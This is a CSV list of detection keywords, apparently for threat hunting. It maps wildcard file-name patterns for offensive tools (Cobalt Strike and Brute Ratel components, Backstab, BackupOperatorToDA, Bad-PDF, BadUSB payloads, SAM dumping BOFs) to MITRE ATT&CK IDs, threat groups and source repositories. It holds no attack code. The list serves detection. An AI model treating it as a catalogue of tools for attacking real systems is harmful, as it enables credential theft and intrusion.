-*Backdoor:Linux*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:Python*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:VBS/*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:Win64*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,10,10,N/A,N/A,N/A,N/A -*BackdoorableScript*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*--backdoor-all*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*BackdoorLNK*,offensive_tool_keyword,StayKit,StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1059 - T1053 - T1124,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*backdoorlnkdialog*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*backstab.exe*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*Backstab.sln*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*backstab.x64.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z 
-*backstab.x86.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*Backstab/Driverloading*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*Backstab-master*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*BackupOperatorToDA.cpp*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege 
Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupOperatorToDA.exe*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupOperatorToDA.sln*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupOperatorToDA-master*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupPrivSAM \\*,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,0,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -*backupprivsam.*,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,1,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -*bad client public DH value*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error 
that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*Bad HTTP verb.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*badger_exports.h*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_no_acl_1030_objects.log*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*badger_svc.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A 
-*badger_template.ps1*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_x64.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_x64_*.bin*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_x64_aws.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A 
-*badger_x64_stealth_rtl.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*BadgerAtoi*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerDispatch*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerDispatchW*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerMemcpy*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary 
Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerMemset*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerStrcmp*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerStrlen*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerWcscmp*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - 
T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerWcslen*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Bad-Pdf*,offensive_tool_keyword,Bad-PDF,Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.,T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003,TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011,N/A,N/A,Credential Access,https://github.com/deepzec/Bad-Pdf,1,1,N/A,N/A,10,980,213,2020-08-19T06:54:51Z,2018-04-29T15:21:35Z -*BadPotato.cs*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BadPotato.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*badpotato.exe*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato,1,1,N/A,N/A,,N/A,,, -*badtouch*,offensive_tool_keyword,badtouch,Scriptable network authentication cracker,T1110 - T1210.001 - T1558.003,TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://github.com/kpcyrd/badtouch,1,0,N/A,N/A,4,363,44,2022-03-24T09:53:51Z,2018-03-15T22:27:56Z -*BadUSB_AddAdmin.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_DownloadExecute.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_FacebookPost.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_HideWindow.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_LockYourComputer.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadZure-main*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*bananaKitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*BaRMIe*,offensive_tool_keyword,BaRMIe,BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.,T1522 - T1070 - T1573 - T1071,TA0001 - TA0003 - TA0008 - TA0011,N/A,N/A,Information Gathering,https://github.com/NickstaDB/BaRMIe,1,0,N/A,N/A,7,691,107,2017-09-28T22:38:02Z,2017-09-24T18:54:12Z -*baron-samedit-heap-based-overflow-sudo.txt*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z 